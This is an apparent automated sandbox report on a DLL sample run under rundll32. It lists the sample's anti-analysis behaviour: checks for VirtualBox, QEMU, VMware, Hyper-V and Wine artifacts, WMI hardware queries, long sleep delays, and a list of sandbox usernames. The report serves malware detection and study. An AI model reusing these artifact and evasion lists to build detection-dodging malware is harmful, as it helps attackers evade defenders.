                    Source: C:\Windows\System32\rundll32.exeCode function: qemu-ga qemu-ga Checking QEMU directory %s Checking QEMU directory %s 4_2_000001C33871FE00
                    Source: C:\Windows\System32\rundll32.exeCode function: vboxservice.exe vboxservice.exe vboxtray.exe 4_2_000001C33871E990
                    Source: C:\Windows\System32\rundll32.exeCode function: vboxvideo VBoxVideoW8 VBoxWddm 4_2_000001C33871EC20
                    Source: C:\Windows\System32\rundll32.exeCode function: qemu qemu QEMU QEMU 4_2_000001C33871FFE0
                    Source: C:\Windows\System32\rundll32.exeCode function: vbox VBOX 4_2_000001C33871EF51
                    Source: C:\Windows\System32\rundll32.exeCode function: vbox VBOX 4_2_000001C33871EFD0
                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Windows\System32\loaddll64.exe TID: 3368Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: VBoxGuestJump to behavior
                    Source: C:\Windows\System32\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\drivers\VBoxSF.sysJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: VBoxTrayIPCJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\vboxtray.exeJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\vboxhook.dllJump to behavior
                    Source: C:\Windows\System32\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDateJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\drivers\VBoxGuest.sysJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\drivers\VBoxVideo.sysJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: \pipe\VBoxTrayIPCJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\drivers\VBoxMouse.sysJump to behavior
                    Source: C:\Windows\System32\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: VBoxMiniRdrDNJump to behavior
                    Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Windows\System32\vboxservice.exeJump to behavior
                    Source: C:\Windows\System32\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Windows\System32\rundll32.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,3_2_0000021EF3020FD0
                    Source: C:\Windows\System32\rundll32.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,4_2_000001C338720FD0
                    Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 45000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 33000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 38000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 44000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 42000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 41000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 37000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 39000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 45000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 33000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 38000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 44000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 42000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 41000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 37000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 39000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 45000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 33000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 38000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 44000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 42000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 41000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 37000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 39000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-47723
                    Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-47705
                    Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-47982
                    Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-58885
                    Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-58678
                    Source: rundll32.exeBinary or memory string: Checking qemu processes %s
                    Source: rundll32.exeBinary or memory string: qemu-ga.exe
                    Source: rundll32.exeBinary or memory string: \\.\VBoxMiniRdrDN
                    Source: rundll32.exeBinary or memory string: VBoxTrayToolWnd
                    Source: rundll32.exeBinary or memory string: \\.\VBoxTrayIPC
                    Source: rundll32.exeBinary or memory string: VBoxTrayToolWndClass
                    Source: rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '\\.\VBoxMiniRdrDN\\.\VBoxGuest\\.\pipe\VBoxMiniRdDN\\.\VBoxTrayIPC\\.\pipe\VBoxTrayIPCChecking device %s VBoxTrayToolWndClassVBoxTrayToolWndVirtualBox Shared Foldersvboxservice.exevboxtray.exeChecking VirtualBox process %s SELECT * FROM Win32_NetworkAdapterConfigurationMACAddress08:00:27vboxvideoVBoxVideoW8VBoxWddmSELECT * FROM Win32_NTEventlogFileFileNameSystemSourcesVirtualBoxvboxVBOXSELECT * FROM Win32_PnPEntityDeviceIdPCI\VEN_80EE&DEV_CAFEName82801FB82441FX82371SBOpenHCDSELECT * FROM Win32_BusACPIBus_BUS_0PCI_BUS_0PNP_BUS_0SELECT * FROM Win32_BaseBoardProductVirtualBoxManufacturerOracle CorporationSELECT * FROM Win32_PnPDeviceCaptionPNPDeviceIDVEN_VBOXQEMUqemu-ga.exevdagent.exevdservice.exeChecking qemu processes %s qemu-gaSPICE Guest ToolsChecking QEMU directory %s qemuQEMUBOCHSBXPCwine_get_unix_file_nameSOFTWARE\WineSYSTEM\ControlSet001\Services\vioscsiSYSTEM\ControlSet001\Services\viostorSYSTEM\ControlSet001\Services\VirtIO-FS ServiceSYSTEM\ControlSet001\Services\VirtioSerialSYSTEM\ControlSet001\Services\BALLOONSYSTEM\ControlSet001\Services\BalloonServiceSYSTEM\ControlSet001\Services\netkvmSystem32\drivers\balloon.sysSystem32\drivers\netkvm.sysSystem32\drivers\pvpanic.sysSystem32\drivers\viofs.sysSystem32\drivers\viogpudo.sysSystem32\drivers\vioinput.sysSystem32\drivers\viorng.sysSystem32\drivers\vioscsi.sysSystem32\drivers\vioser.sysSystem32\drivers\viostor.sysVirtio-Win\CurrentUserSandboxEmilyHAPUBWSHong LeeIT-ADMINJohnsonMillermilozsPeter Wilsontimmysand boxmalwaremaltesttest uservirusJohn DoeChecking if username matches : %s VMWareSELECT * FROM Win32_ComputerSystemModelHVM domUprocexp64.exeprl_cc.exeprl_tools.exeChecking Parallels processes: %s
                    Source: rundll32.exeBinary or memory string: System32\drivers\VBoxMouse.sys
                    Source: rundll32.exeBinary or memory string: VMUSrvc.exe
                    Source: rundll32.exeBinary or memory string: qemu-ga
                    Source: rundll32.exeBinary or memory string: System32\drivers\VBoxGuest.sys
                    Source: rundll32.exe, 00000002.00000003.345380383.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345473164.000001B97C37E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348219875.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348291878.0000021EF14F1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.354650341.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.354730046.000001C336C3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
                    Source: rundll32.exe, 00000003.00000003.355338249.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                    Source: rundll32.exe, 00000004.00000003.365598019.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.365622335.000001C336C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.362004087.000001C336C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.359859619.000001C336C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: rundll32.exe, 00000003.00000003.350037322.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349110139.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348130642.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355122911.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.351928065.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348704806.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.778857843.0000021EF14C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.354220320.0000021EF14C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349620502.0000021EF14C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-HypervisorM
                    Source: rundll32.exeBinary or memory string: System32\vboxservice.exe
                    Source: rundll32.exe, 00000002.00000003.345454368.000001B97C385000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345380383.000001B97C373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V-Hyperv
                    Source: rundll32.exeBinary or memory string: \\.\VBoxGuest
                    Source: rundll32.exeBinary or memory string: vboxservice.exe
                    Source: rundll32.exe, 00000004.00000003.370328491.000001C336C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\qemu-ga
                    Source: rundll32.exeBinary or memory string: System32\vboxtray.exe
                    Source: rundll32.exe, 00000003.00000003.349675038.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348219875.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.354413918.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.351983402.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.779167810.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348743161.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.350087607.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355338249.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349167458.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357480625.000001C336C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-HypervisorHgy
                    Source: rundll32.exe, 00000002.00000003.352702307.000001B97C373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\qemu-ga7|
                    Source: rundll32.exeBinary or memory string: HARDWARE\ACPI\FADT\VBOX__
                    Source: rundll32.exe, 00000004.00000002.778981998.000001C336BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
                    Source: rundll32.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: rundll32.exeBinary or memory string: vboxtray.exe
                    Source: rundll32.exe, 00000003.00000003.350087607.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityNECVMWar VMware SATA CD00{4d36e965-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityCD-ROM DriveSCSI\CDROM&VEN_NECVMWAR&PROD_EMPTKE44_SATA_CD00\5&280B647&0&000000System.String[](Standard CD-ROM drives)NECVMWar VMware SATA CD00CDROMSCSI\CDROM&VEN_NECVMWAR&PROD_M9OO6K3A_SATA_CD00\5&280B647&0&000000cdromOKWin32_ComputerSystemcomputerLMEMp
                    Source: rundll32.exe, 00000003.00000003.355338249.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityNECVMWar VMware SATA CD00{4d36e965-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityCD-ROM DriveSCSI\CDROM&VEN_NECVMWAR&PROD_EMPTKE44_SATA_CD00\5&280B647&0&000000System.String[](Standard CD-ROM drives)NECVMWar VMware SATA CD00CDROMSCSI\CDROM&VEN_NECVMWAR&PROD_M9OO6K3A_SATA_CD00\5&280B647&0&000000cdromOKWin32_ComputerSystemcomputerp
                    Source: rundll32.exe, 00000004.00000003.357480625.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.368055513.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.365598019.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.354650341.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.370667973.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.370328491.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.779240741.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.355521989.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.359859619.000001C336C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-Hypervisor
                    Source: rundll32.exe, 00000003.00000003.354413918.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iles\qemu-gaN
                    Source: rundll32.exeBinary or memory string: HARDWARE\ACPI\RSDT\VBOX__
                    Source: rundll32.exeBinary or memory string: \\.\pipe\VBoxTrayIPC
                    Source: rundll32.exeBinary or memory string: System32\vboxhook.dll
                    Source: rundll32.exeBinary or memory string: System32\vboxmrxnp.dll
                    Source: rundll32.exe, 00000002.00000003.349703575.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345824476.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345380383.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352990332.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.346257503.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.347331575.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352702307.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.346770799.000001B97C373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `HMicrosoft-Windows-Hyper-V-Hypervisor
                    Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                    Source: rundll32.exe, 00000002.00000003.345473164.000001B97C37E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bbusIntel-iaLPSS-GPIOIntel-iaLPSS-I2CIntel-iaLPSS2-GPIO2Intel-iaLPSS2-I2CintelppmIPMGMIPMIDRVIPNATHLPIPRouterManagerireventsisapnpiScsiPrtItSas35ikbdclasskbdhidkdnicKerberosLfsvclltdioLmHostsLsaSrvLSI_SASLSI_SAS2iLSI_SAS3iLSI_SSSLSMmegasasmegasas2imegasas35imegasrMicrosoft-Windows-Audit-CVEMicrosoft-Windows-BitLocker-APIMicrosoft-Windows-BitLocker-DriverMicrosoft-Windows-Bits-ClientMicrosoft-Windows-Bluetooth-BthLEPrepairingMicrosoft-Windows-CoreSystem-InitMachineConfigMicrosoft-Windows-CoreSystem-NetProvision-JoinProviderOnlineMicrosoft-Windows-CorruptedFileRecovery-ClientMicrosoft-Windows-CorruptedFileRecovery-ServerMicrosoft-Windows-Devices-BackgroundMicrosoft-Windows-DfsSvcMicrosoft-Windows-Dhcp-ClientMicrosoft-Windows-DHCPv6-ClientMicrosoft-Windows-Diagnostics-NetworkingMicrosoft-Windows-Directory-Services-SAMMicrosoft-Windows-DiskDiagnosticMicrosoft-Windows-DistributedCOMMicrosoft-Windows-DNS-ClientMicrosoft-Windows-DriverFrameworks-UserModeMicrosoft-Windows-EnhancedStorage-EhStorTcgDrvMicrosoft-Windows-EventCollectorMicrosoft-Windows-EventlogMicrosoft-Windows-exFAT-SQMMicrosoft-Windows-Fat-SQMMicrosoft-Windows-Fault-Tolerant-HeapMicrosoft-Windows-FilterManagerMicrosoft-Windows-FirewallMicrosoft-Windows-FMSMicrosoft-Windows-FunctionDiscoveryHostMicrosoft-Windows-GPIO-ClassExtensionMicrosoft-Windows-GroupPolicyMicrosoft-Windows-HALMicrosoft-Windows-HttpEventMicrosoft-Windows-Hyper-V-HypervisorMicrosoft-Windows-IphlpsvcMicrosoft-Windows-IsolatedUserModeMicrosoft-Windows-Kernel-BootMicrosoft-Windows-Kernel-GeneralMicrosoft-Windows-Kernel-Interrupt-SteeringMicrosoft-Windows-Kernel-IOMicrosoft-Windows-Kernel-PnPMicrosoft-Windows-Kernel-PowerMicrosoft-Windows-Kernel-Processor-PowerMicrosoft-Windows-Kernel-TmMicrosoft-Windows-Kernel-WHEAMicrosoft-Windows-Kernel-XDVMicrosoft-Windows-LanguagePackSetupMicrosoft-Windows-Memory-Diagnostic-Task-HandlerMicrosoft-Windows-MemoryDiagnostics-ResultsMicrosoft-Windows-MemoryDiagnostics-ScheduleMicrosoft-Windows-MountMgrMicrosoft-Windows-NDISMicrosoft-Windows-NdisImPlatformSysEvtProviderMicrosoft-Windows-NetworkBridgeMicrosoft-Windows-NtfsMicrosoft-Windows-Ntfs-UBPMMicrosoft-Windows-OfflineFilesMicrosoft-Windows-OverlayFilterMicrosoft-Windows-PersistentMemory-NvdimmMicrosoft-Windows-PersistentMemory-PmemDiskMicrosoft-Windows-Power-Meter-PollingMicrosoft-Windows-Power-TroubleshooterMicrosoft-Windows-ReFSMicrosoft-Windows-ReFS-v1Microsoft-Windows-ResetEngMicrosoft-Windows-Resource-Exhaustion-DetectorMicrosoft-Windows-ResourcePublicationMicrosoft-Windows-SCPNPMicrosoft-Windows-Serial-ClassExtensionMicrosoft-Windows-Serial-ClassExtension-V2Microsoft-Windows-ServicingMicrosoft-Windows-SetupMicrosoft-Windows-SetupPlatformMicrosoft-Windows-SPB-ClassExtensionMicrosoft-Windows-SPB-HIDI2CMicrosoft-Windows-Spell-CheckingMicrosoft-Windows-SpellCheckerMicrosoft-Windows-StartupRepairMicrosoft-Windows-Subsys-SMSSMicrosoft-Windows-TaskSchedulerMicrosoft-Windows-TerminalServices-LocalSessionManagerMicrosoft-Windows-TerminalServ
                    Source: rundll32.exe, 00000003.00000003.348788520.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349200855.0000021EF14F9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349711381.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348255439.0000021EF14F4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.350087607.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.350109127.0000021EF14FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349167458.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348272281.0000021EF14F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cht4vbds-Hyper-V-Hyperv0
                    Source: rundll32.exe, 00000002.00000003.349703575.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345824476.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345380383.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352990332.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.346257503.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.347331575.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352702307.000001B97C373000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.346770799.000001B97C373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HMicrosoft-Windows-Hyper-V-HypervisorppData\Locab
                    Source: rundll32.exe, 00000002.00000003.345454368.000001B97C385000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.345380383.000001B97C373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: intelppmHyper-V-Hyperv
                    Source: rundll32.exeBinary or memory string: VMSrvc.exe
                    Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxGuest
                    Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxService
                    Source: rundll32.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxMouse
                    Source: rundll32.exeBinary or memory string: VMWare
                    Source: rundll32.exeBinary or memory string: Checking QEMU directory %s
                    Source: rundll32.exe, 00000003.00000003.348788520.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349200855.0000021EF14F9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349711381.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.348255439.0000021EF14F4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.779283722.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.350087607.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355521210.0000021EF14FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.350109127.0000021EF14FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.349167458.0000021EF14E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355366404.0000021EF14F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s-Hyper-V-Hyperv0
                    Source: rundll32.exe, 00000003.00000002.779283722.0000021EF14FB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355521210.0000021EF14FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.355366404.0000021EF14F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t4vbds-Hyper-V-Hyperv0
                    Source: rundll32.exeBinary or memory string: System32\drivers\VBoxSF.sys
                    Source: rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >VMSrvc.exeChecking Virtual PC processes %s VMUSrvc.exe
                    Source: rundll32.exe, 00000003.00000002.778727508.0000021EF149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
                    Source: rundll32.exe, 00000004.00000003.365598019.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.365622335.000001C336C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.362004087.000001C336C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.359859619.000001C336C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityMicrosoft Hyper-V Generation Counter{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityMicrosoft Hyper-V Generation CounterACPI\VMW0001\7System.String[]MicrosoftMicrosoft Hyper-V Generation CounterSystemACPI\VMW0001\7gencounterOKWin32_ComputerSystemcomputerP-716T771
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF31119BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000021EF31119BC
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3017D40 LoadLibraryA,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueA,CloseHandle,GetProcAddress,CloseHandle,3_2_0000021EF3017D40
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3020FD0 GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,3_2_0000021EF3020FD0
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF31119BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000021EF31119BC
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3144530 SetUnhandledExceptionFilter,3_2_0000021EF3144530
